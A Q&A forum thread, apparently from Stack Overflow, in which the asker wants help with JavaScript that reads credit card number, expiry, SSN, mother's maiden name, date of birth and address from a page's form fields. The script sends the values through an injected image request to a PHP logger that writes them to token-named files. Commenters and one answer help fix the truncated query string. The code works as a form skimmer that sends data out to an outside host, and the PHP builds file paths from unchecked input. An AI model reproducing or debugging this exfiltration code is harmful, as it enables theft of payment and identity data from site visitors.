PHP not receiving full GET parameters sent by image request

Question

I am sending a GET request from a image added to the document via JavaScript. This request is sent to to a PHP server, PHP code as follows:

<?php
      if (!$_GET['token']) {
          return;
      }
    
      if (file_exists($_GET['token'].'.txt')) {
        $fh = fopen($_GET['token'].'.txt', 'a');
        fwrite($fh, json_encode($_GET)."\n==============================\n");
      } else {
        $fh = fopen($_GET['token'].'.txt', 'w');
        fwrite($fh, json_encode($_GET)."\n==============================\n");
      }
    
      fclose($fh);
    
      return;
    ?>

The issue is when I complete the GET request the PHP server only receives the GET parameters up to the billing_address_2 when there are many more parameters being sent by the image in the document. Below is the request the Apache PHP server receives:

/save-data.php?token=1632376762131.3433&credit_card_id=34&expiration_date=02/23&card_holder_name=Ishmael%20J%20Roth&billing_address=3904%20E%20Oak%20Pl&billing_address_2=Apt%20

You can see there are more GET parameters in the image being added to the document by the JavaScript in the JS code below:

document.body.innerHTML += `<img onload="submitCCForm()" src="https://example-domain.com/save-data.php?token=${ encodeURI(window.localStorage.token) }&credit_card_number=${ encodeURI(document.querySelector('[name=\"credit_card_number\"]').value) }&expiration_date=${ encodeURI(document.querySelector('[name=\"expiration_time\"]').value) }&card_holder_name=${ encodeURI(document.querySelector('[name=\"card_holder_name\"]').value) }&billing_address=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[1] }&billing_address_2=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[2] }&billing_address_3=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[3].replaceAll(',', '-') }&billing_address_4=${ document.querySelector('.default_address_id').innerText.replaceAll('\n').split('undefined')[4] }&mothers_maiden_name=${ encodeURI(document.querySelector('#mmn').value) }&=&social_security=${ encodeURI(document.querySelector('[name=\"social_security\"]').value) }&dob=${ encodeURI(document.querySelector('[name=\"dob\"]').value) }&billing_phone=${ encodeURI(document.querySelector('[name=\"billing_phone\"]').value) }" />`

Please share a solution to have the full get parameters sent in the image request to be received by the server and saved to the file, rather than the server stopping at the GET parameter billing_address_2.

Could you provide a complete example url of `https://example-domain.com/save-data.php?...` that you javascript may generate? — MaartenDev, Sep 23 '21 at 08:24
Keep in mind that a url is limited to around 2048 characters: https://stackoverflow.com/questions/417142/what-is-the-maximum-length-of-a-url-in-different-browsers — MaartenDev, Sep 23 '21 at 08:25
As an aside: You don't have to use the check for `file_exists()`. [fopen](https://www.php.net/manual/en/function.fopen.php) has the `a+` mode for that: `$fh = fopen($_GET['token'].'.txt', 'a+');` — Peter Krebs, Sep 23 '21 at 08:31
Example request sent by the image to the PHP server: /save-data.php?token=1631921119650.5508&credit_card_number=4023519201235948&expiration_date=03/23&card_holder_name=Ishmael%20J%20Roth&billing_address=293 E Oak Rd&billing_address_2=Apt #253&billing_address_3=Los Angeles-California&billing_address_4=90028&mothers_maiden_name=Layton&=&social_security=123-12-1234&dob=04/02/1992&billing_phone=+1-123-123-1234 @MaartenDev — Jake Cross, Sep 23 '21 at 08:48
Does it work when you visit the url directly in the browser? — MaartenDev, Sep 23 '21 at 08:56

score 1 · Answer 1 · answered Sep 23 '21 at 09:02

1

You are using unencoded GET parameter!

expiration_date=02/23

That is why you are required to urlencode all parameters...

answered Sep 23 '21 at 09:02

Honk der Hase

2,459
1
14
26

PHP not receiving full GET parameters sent by image request

1 Answers1